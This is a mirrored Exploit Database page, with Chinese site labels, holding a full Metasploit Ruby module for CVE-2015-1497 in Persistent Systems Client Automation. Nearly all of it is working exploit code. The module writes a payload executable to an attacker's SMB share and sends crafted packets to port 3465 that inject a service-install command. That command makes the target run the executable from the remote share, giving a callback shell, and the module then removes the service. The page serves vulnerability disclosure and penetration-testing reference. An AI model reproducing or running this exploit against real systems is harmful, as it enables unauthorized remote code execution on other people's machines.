Persistent Systems Client Automation – Command Injection Remote Code Execution (Metasploit)

• Exploit Database
• 41 阅读

• 作者： Ben Turner
  日期： 2015-02-27
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36206/

• # Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
  # Date: 2014-10-01
  # Exploit Author: Ben Turner
  # Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/
  # Version: 7.9, 8.1, 9.0, 9.1
  # Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
  # CVE-2015-1497
  # CVSS: 10
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = ExcellentRanking
  
  	# Exploit mixins should be called first
  	include Msf::Exploit::Remote::SMB
  	include Msf::Exploit::EXE	
  	include Msf::Auxiliary::Report
  
  	# Aliases for common classes
  	SIMPLE = Rex::Proto::SMB::Client
  	XCEPT= Rex::Proto::SMB::Exceptions
  	CONST= Rex::Proto::SMB::Constants
  
  
  	def initialize
  		super(
  			'Name'=> 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
  			'Description' => %Q{
  				This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. 
  			},
  			'Author' => [ 'Ben Turner' ],
  			'License'=> BSD_LICENSE,
  			'References'=>
  				[
  				],
  			'Privileged' => true,
  			'DefaultOptions' =>
  				{
  					'WfsDelay' => 10,
  					'EXITFUNC' => 'process'
  				},
  			'Payload' => { 'BadChars' => '', 'DisableNops' => true },
  			'Platform'=> ['win'],
  			'Targets' =>
  				[
  					[ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}]
  				],
  			'DefaultTarget' => 0,
  			'DisclosureDate' => 'January 10 2014'
  		)
  
  		register_options([
  			OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']),
  			OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']),
  			Opt::RPORT(3465),
  		], self.class)
  
  	end
  
  	def exploit
  
  		createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
  		createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\""
  		createservice << "\x22\x00\x00\x00"
  
  startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
  startservice << "Nvdkit service start test"
  startservice << "\x22\x00\x00\x00"
  
  		removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
  		removeservice << "Nvdkit service remove test"
  		removeservice << "\x22\x00\x00\x00"
  
  		def filedrop()
  			begin
  				origrport = self.datastore['RPORT']
  				self.datastore['RPORT'] = 445
  				origrhost = self.datastore['RHOST']
  				self.datastore['RHOST'] = self.datastore['SMBServer']
  				connect()
  				smb_login()
  				print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...")
  				self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
  				exe = generate_payload_exe
  				fd = smb_open("\\installservice.exe", 'rwct')
  				fd << exe
  				fd.close
  
  				self.datastore['RPORT'] = origrport
  				self.datastore['RHOST'] = origrhost
  			
  			rescue Rex::Proto::SMB::Exceptions::Error => e
  				print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")	
  				abort()
  			end
  		end
  
  		def filetest()
  			begin
  				origrport = self.datastore['RPORT']
  				self.datastore['RPORT'] = 445
  				origrhost = self.datastore['RHOST']
  				self.datastore['RHOST'] = self.datastore['SMBServer']
  				connect()
  				smb_login()
  				print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
  				self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
  				file = "\\installservice.exe"
  				filetest = smb_file_exist?(file)
  				if filetest
  					print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n")
  				else
  					print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!")
  						
  				end
  
  				self.datastore['RPORT'] = origrport
  				self.datastore['RHOST'] = origrhost
  			
  			rescue Rex::Proto::SMB::Exceptions::Error => e
  				print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")	
  				abort()
  			end
  		end
  
  		begin
  			filedrop()
  			filetest()
  			connect()
  			sock.put(createservice)
  			print_status("Creating the callback payload and installing the remote service")
  			disconnect
  			sleep(5)
  			connect()
  			sock.put(startservice)
  print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service")
  			disconnect
  			sleep(30)
  			connect
  			sock.put(removeservice)
  			disconnect
  
  		rescue ::Exception => e
  			print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n")	
  			abort()
  		
  		end
  	end
  end